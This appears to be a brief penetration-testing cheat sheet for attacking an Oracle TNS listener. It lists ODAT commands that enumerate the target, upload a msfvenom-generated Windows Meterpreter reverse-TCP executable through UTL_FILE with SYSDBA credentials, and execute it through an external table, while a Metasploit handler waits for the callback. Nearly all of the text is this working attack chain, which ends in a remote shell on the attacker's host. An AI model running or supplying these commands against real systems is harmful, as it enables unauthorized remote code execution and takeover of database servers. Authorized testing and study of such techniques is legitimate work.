Oracle TNS Listener pentesting

Tool: https://github.com/quentinhardy/odat/releases/

Example usage:

1)

./odat.py all -s IP_ADDRESS

2)

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=OUR_IP LPORT=PORT -f exe > malicious.exe

3)

./odat.py utlfile -s IP_ADDRESS -U USER -P PASSWORD -d SID --sysdba --putFile c:/ malicious.exe malicious.exe

4)

use exploit/multi/handler (Metasploit)

5)

./odat.py externaltable -s IP_ADDRESS -U USER -P PASSWORD -d SID --sysdba --exec c:/ malicious.exe